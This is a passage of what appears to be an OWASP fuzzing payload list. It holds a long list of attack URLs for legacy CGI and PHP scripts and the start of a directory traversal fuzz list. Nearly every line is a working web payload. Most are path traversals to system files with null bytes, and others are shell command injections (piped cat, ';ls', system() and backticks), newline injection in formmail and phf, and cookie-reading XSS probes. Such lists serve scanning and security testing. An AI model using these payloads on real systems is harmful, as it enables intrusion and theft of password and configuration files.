auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
